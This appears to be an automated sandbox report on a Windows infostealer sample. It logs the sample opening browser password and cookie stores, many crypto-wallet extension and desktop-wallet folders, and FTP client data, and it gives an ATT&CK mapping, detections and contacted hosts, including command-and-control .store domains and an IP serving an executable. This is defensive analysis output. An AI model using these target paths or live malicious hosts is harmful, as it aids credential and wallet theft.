              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4936, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4936, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              2
              Process Injection
              1
              Masquerading
              2
              OS Credential Dumping
              1
              Query Registry
              Remote Services1
              Archive Collected Data
              21
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              41
              Disable or Modify Tools
              LSASS Memory761
              Security Software Discovery
              Remote Desktop Protocol41
              Data from Local System
              11
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
              Bypass User Account Control
              361
              Virtualization/Sandbox Evasion
              Security Account Manager2
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Process Injection
              NTDS361
              Virtualization/Sandbox Evasion
              Distributed Component Object ModelInput Capture124
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Deobfuscate/Decode Files or Information
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
              Obfuscated Files or Information
              Cached Domain Credentials223
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
              Bypass User Account Control
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\94JSCZGRDUWCLDEBY2HC1S58YAX1.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u0%URL Reputationsafe
              https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              crisiwarny.store
              104.21.95.91
              truetrue
                unknown
                presticitpo.store
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  presticitpo.storetrue
                    unknown
                    scriptyprefej.storetrue
                      unknown
                      https://crisiwarny.store/apitrue
                        unknown
                        necklacedmny.storetrue
                          unknown
                          fadehairucw.storetrue
                            unknown
                            navygenerayk.storetrue
                              unknown
                              founpiuer.storetrue
                                unknown
                                thumbystriw.storetrue
                                  unknown
                                  crisiwarny.storetrue
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://crisiwarny.store/apiAEfile.exe, 00000000.00000003.1593633698.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722535596.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1724772459.0000000000E15000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://crisiwarny.store/api/file.exe, 00000000.00000003.1581573293.0000000000E02000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://185.215.113.16/Ufile.exe, 00000000.00000002.1724682643.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722966478.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722841252.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://crisiwarny.store/efile.exe, 00000000.00000003.1548543584.00000000055D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1517531200.0000000005608000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://185.215.113.16/off/def.exeRfile.exe, 00000000.00000002.1724509005.0000000000D90000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1722621117.0000000000D90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1549025339.00000000056DD000.00000004.00000800.00020000.00000000.sdmpfalse
